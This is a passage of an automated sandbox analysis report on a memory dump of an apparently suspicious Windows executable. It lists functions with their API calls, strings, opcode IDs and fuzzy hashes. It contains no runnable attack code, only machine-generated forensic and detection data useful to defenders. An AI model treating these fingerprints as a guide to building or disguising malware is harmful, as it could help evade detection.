                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$Dispatch
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 14830804-0
                                                                                                                                                                                                      • Opcode ID: 7f40edd392db81d6522a06ff111facb367b84e6f02b96f2d700eafeb4f1e8a26
                                                                                                                                                                                                      • Instruction ID: a1c17368cc6fdfa08c727d52e015230d52eaed9b0517d6508992bcb0d81ef71e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f40edd392db81d6522a06ff111facb367b84e6f02b96f2d700eafeb4f1e8a26
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2F0B432E4130962DF2096996C42FEB7BAC9B44B10F140053FB04A71D0D6E5A44286E4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00415F50, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00415FE2
                                                                                                                                                                                                        • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                                                                      • API String ID: 657562460-3788999226
                                                                                                                                                                                                      • Opcode ID: d2a5ac7a09ec14949430fdf86236fc691a3145d31ca89b821a2a2258ad2a2fb8
                                                                                                                                                                                                      • Instruction ID: 062493fe71bda258871ba60a2f6f35179966240c7be00a7e807cfa683484c744
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2a5ac7a09ec14949430fdf86236fc691a3145d31ca89b821a2a2258ad2a2fb8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8011E675600118DF8B04EF1CD981CDABBE9EF84300744816AED098F70AEB35EE65C6A5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00413A90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413B0A
                                                                                                                                                                                                        • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                                                                      • API String ID: 657562460-3788999226
                                                                                                                                                                                                      • Opcode ID: 0ad4a0ca8fdadbc1a12cf66a996cd1011d67085deb4d362cb70db5a7c32d017b
                                                                                                                                                                                                      • Instruction ID: 58ba692ce99c870a1dcba0d104e91e6c126768a8e2c2fae69a1ad948a11fc536
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ad4a0ca8fdadbc1a12cf66a996cd1011d67085deb4d362cb70db5a7c32d017b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F401F171200705ABD720CFACC09068BFBE8AF80725F20853FEA5583381EBB5E944C784
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00454C00, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00454AE0: GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                                                                                                                        • Part of subcall function 00454AE0: GetFileType.KERNEL32(00000000), ref: 00454B05
                                                                                                                                                                                                        • Part of subcall function 00454AE0: __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                                                                                                                      • _raise.LIBCMT ref: 00454C18
                                                                                                                                                                                                        • Part of subcall function 0042A12E: __getptd_noexit.LIBCMT ref: 0042A16B
                                                                                                                                                                                                        • Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00454C0C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                                                                                                                      • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                                                                                                                      • API String ID: 2149077303-4210838268
                                                                                                                                                                                                      • Opcode ID: c8b60d106a6ddf9770fe8ded3b270afc7ab6773223e56d6f9ab2ba1de5c26324
                                                                                                                                                                                                      • Instruction ID: fa72e03f5863b2a05375eef283b674a1c5903e86e1e3734bc2555e426bc738f9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8b60d106a6ddf9770fe8ded3b270afc7ab6773223e56d6f9ab2ba1de5c26324
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FD09E795892107FED022791EC07A1E7A51AF9471CF808419F69A041A2D6768534AA5B
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00423A38, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 00423A7D
                                                                                                                                                                                                        • Part of subcall function 00420E53: __lock.LIBCMT ref: 00420E76
                                                                                                                                                                                                      • __fclose_nolock.LIBCMT ref: 00423A88
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2800547568-0
                                                                                                                                                                                                      • Opcode ID: 12bd1d3cff3597424f6cf441e7f6ef2d7829569bf8c2b731cad610acca9b362c
                                                                                                                                                                                                      • Instruction ID: e9f7363e2c125346a9344b83ccdc7017391740cbbddd1805e0fe7159b8e2b74d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12bd1d3cff3597424f6cf441e7f6ef2d7829569bf8c2b731cad610acca9b362c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EF0F631B01724AAD710AF66680275E6AB46F00339F90815FE4A09A1C1CB7C87428F59
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0042FB64, Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __lock.LIBCMT ref: 0042FB7B
                                                                                                                                                                                                        • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                                                                                        • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                                                                                                                        • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(00000000,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                                                                                      • __tzset_nolock.LIBCMT ref: 0042FB8E
                                                                                                                                                                                                        • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                                                                                                                                                                                        • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                                                                                                                                                                                        • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                                                                                                                                                                                        • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                                                                                                                                                                                        • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                                                                                                                                                                                        • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1282695788-0
                                                                                                                                                                                                      • Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                                                                                                                      • Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004118C5, Relevance: 2.5, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004118DD
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004118E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseFreeHandleVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2443081362-0
                                                                                                                                                                                                      • Opcode ID: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                                                                                                                                                                                                      • Instruction ID: a75cf17640dcbe18a091e0aebb8a692561bc66dfcc2ddf1384dfcaf55dfbf141
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 361c4fcee47f9886bce79b3ac72f802e467dd4b7b05589e3f2927c820f7a912b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1E08636B415049BC7209B99ECC0B9DB374F785720F20437AD919733D047352D028A58
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00416950, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004169DF
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 120817956-0
                                                                                                                                                                                                      • Opcode ID: 8a02d42dd33a216df8cc63c6f6beba748b7d17bbcaf92180e3e70ee783765c00
                                                                                                                                                                                                      • Instruction ID: aa06b8048d3bf760f527e7d0bbb9ad0a08af858ba63749c6f8d7f01112261dfe
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a02d42dd33a216df8cc63c6f6beba748b7d17bbcaf92180e3e70ee783765c00
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E731E3B2A006059BCB20DF68C5816AEB7F9EF45750F21823FE856D7740DB38DD448BA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00416760, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004167E6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 120817956-0
                                                                                                                                                                                                      • Opcode ID: c9838848fe5c8eec5df2989d35d9b90d637aecb244023d97c053b5662a189974
                                                                                                                                                                                                      • Instruction ID: efb258ddcfae47249c3acbfcaa5a8e986a9cbccba7edf1416c99c2e95f316cd5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9838848fe5c8eec5df2989d35d9b90d637aecb244023d97c053b5662a189974
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B83126B1A016019FDB24DF29C5807AEBBF4EB40364F104A2EE426977C0D738DA80C7A6
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00416570, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004165C5
                                                                                                                                                                                                        • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 657562460-0
                                                                                                                                                                                                      • Opcode ID: e0e5a2f55fe47bad399a7528cbd0c3c4869536831e185f17c6957d537ae03e1f
                                                                                                                                                                                                      • Instruction ID: 5021f87c270b400a587bd724d9b61bde01bf534475f8b0cbfe068d44a909a5c2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0e5a2f55fe47bad399a7528cbd0c3c4869536831e185f17c6957d537ae03e1f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A72124B5A00115DBCB14DF5CD981B9ABFA9EF45700F04822AEC058B348D738EA14CBE5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00412840, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00413C40: _memset.LIBCMT ref: 00413C83
                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,?,00000000,00000000,?), ref: 004128AA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharMultiWide_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2800726579-0
                                                                                                                                                                                                      • Opcode ID: 63f10abe50b5c9ed46830feba45226c0f4560df4a282414d77af9abeaa2a57ed
                                                                                                                                                                                                      • Instruction ID: 77d5c0c78108e6bd7b696174a76f34ed3b4c8b07ae2fa23de187fb57fd92ed49
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63f10abe50b5c9ed46830feba45226c0f4560df4a282414d77af9abeaa2a57ed
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B11D371A00219BBDB11DF59CD41BDFBBA8EF01714F10422AF914A72C0C7BD99558BDA
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041FA10, Relevance: 1.5, APIs: 1, Instructions: 19threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                      • Opcode ID: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                                                                                                                                                                                                      • Instruction ID: 74150d4eedde67828055b261a2b9f98274f0c47e32cd20f87c2cefabb50f2d8a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ac00649bc9f379a6b742ea92144ce4fa1e49017590e60b2748b6a8e655e84ce
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1D05E322883147BE3140A9AAC06F867AC88B15B20F00403AB609DA1C0D9A1A8108A9C
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041FD80, Relevance: 1.5, APIs: 1, Instructions: 18windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00410BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
                                                                                                                                                                                                      • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 0041FDA4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: EnumMessageOpenSend
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1835186980-0
                                                                                                                                                                                                      • Opcode ID: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                                                                                                                                                                                                      • Instruction ID: f1b321f5059a27c682919cb5e20fd2d447803ac3e15b06371c74c2023cac73f2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b855248cb889363fe6aa4b9a8dd9f39f841337135063b4ce115baa5f3e43425
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27E02B311043406AD32097A4DC01F82BBC49F18728F00C81EF7CA6B9C1C5F1B04487ED
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0041FDC0, Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                      • Opcode ID: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                                                                                                                                                                                                      • Instruction ID: 36d07be7825d0dd215c2e58fd0e5fada4a3bc662417c17551b787912ef620d2a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcd01a2ceecdcc7afcdf07ee0c002b865cef6077f7601f89151651f24f0902f2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FD012753C9305B7E7180BA6BC47F593A989B29B00F504036F60DD92D0DAB1F4509A5C
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004220B6, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __fsopen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3646066109-0
                                                                                                                                                                                                      • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                                                                      • Instruction ID: 292279633ce522dfb3aa62ab9f23dea9a591004ce3b356b458beb681742a1975
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDB0927254021C77CF012E82EC02A493B199B60764F448021FB1C181B1E6BBE66496C9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00427F3D, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _doexit.LIBCMT ref: 00427F47
                                                                                                                                                                                                        • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                                                                                                                                        • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00000000,00000001,00000000,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E5B
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E6C
                                                                                                                                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E85
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E95
                                                                                                                                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427E9B
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427EB1
                                                                                                                                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00427C49,000000FF,?,00428B1A,00000011,00000000,?,004250D7,0000000D), ref: 00427EBC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
